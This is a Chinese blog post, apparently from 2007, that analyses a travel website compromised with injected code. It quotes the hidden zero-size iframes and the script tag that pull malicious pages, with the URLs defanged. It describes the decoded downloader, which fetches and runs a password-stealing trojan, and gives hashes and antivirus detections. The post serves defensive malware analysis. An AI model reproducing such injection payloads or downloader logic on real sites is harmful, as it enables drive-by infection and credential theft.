某旅游信息网站被挂马Trojan-PSW.Win32.QQRob.lp等

endurer 原创
2007-02-28 第1

该网站的网页末被加入代码:
/------
<iframe src=hxxp://user**.f**r**e*e.7***7169.net/y**j*1*6***6/xskj.htm width=0 height=0></iframe>
<iframe src=hxxp://user**.f**r**e*e.7***7169.net/y**j*1*6***6/kh0.htm width=0 height=0></iframe><script language=javascript src=hxxp://yu***s*ahi.com/js/test.js></script>
------/


hxxp://user**.f**r**e*e.7***7169.net/y**j*1*6***6/xskj.htm
的内容为JavaScript脚本程序,用String.fromCharCode解密变量t的值并输出。

解出的变量t的值为jscript脚本程序,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 she.exe,保存为 %temp%/svchost.exe和%temp%/svchost.vbs,并利用Shell.Application 对象Q 的 ShellExecute 方法 来运行。

文件说明符 : d:/test/she.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-2-28 12:40:25
修改时间 : 2007-2-28 12:40:26
访问时间 : 2007-2-28 0:0:0
大小 : 21096 字节 20.616 KB
MD5 : 1fdbf69232ca57bd9f25116def0b622b


瑞星报为:Trojan.DL.Direct.et

Scanned file: she.exe - Infected

she.exe - infected by Trojan-Downloader.Win32.Small.dzu

Statistics:

Known viruses:274479Updated:27-02-2007
File size (Kb):21Virus bodies:1
Files:1Warnings:0
Archives:0Suspicious:0

she.exe中包含信息:
/---
I want to dedicate this message to gates. Gates, you suck. Gatesyou really are homosexual
---/
会下载文件hxxp://i***.th***e***c.cn/y**j*1*6***6/js.exe,保存为:c:/js.exe

文件说明符 : d:/test/js.exe
属性 : A---
语言 : 英语(美国)
文件版本 : 5.2.3790.1830
说明 : Generic Host Process for Win32 Services
版权 : (C) Microsoft Corporation. All rights reserved.
备注 :
产品版本 : 5.2.3790.1830
产品名称 : Microsoft(R) Windows(R) Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 : rpcs.exe
源文件名 : rpcs.exe
创建时间 : 2007-2-28 12:55:43
修改时间 : 2007-2-28 12:54:56
访问时间 : 2007-2-28 0:0:0
大小 : 237568 字节 232.0 KB
MD5 : 993561111ed73214fd3507ff7669f764

瑞星报为:Trojan.DL.Inject.sh

Scanned file: js.exe - Infected

js.exe - infected by Trojan-PSW.Win32.QQRob.lp

Statistics:

Known viruses:274479Updated:27-02-2007
File size (Kb):232Virus bodies:1
Files:1Warnings:0
Archives:0Suspicious:0

hxxp://user**.f**r**e*e.7***7169.net/y**j*1*6***6/kh0.htm
找不到网页。

hxxp://yu***s*ahi.com/js/test.js
的内容为:
/------
document.write("<iframe <iframe src=hxxp://yu***s*ahi.com/js/sas.htm width=0 height=0></iframe>")
document.write("<iframe <iframe src=hxxp://yu***s*ahi.com/js/zj.htm width=0 height=0></iframe>")
------/

hxxp://yu***s*ahi.com/js/sas.htm
内容与hxxp://user**.f**r**e*e.7***7169.net/y**j*1*6***6/xskj.htm相同。

hxxp://yu***s*ahi.com/js/zj.htm
找不到网页。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值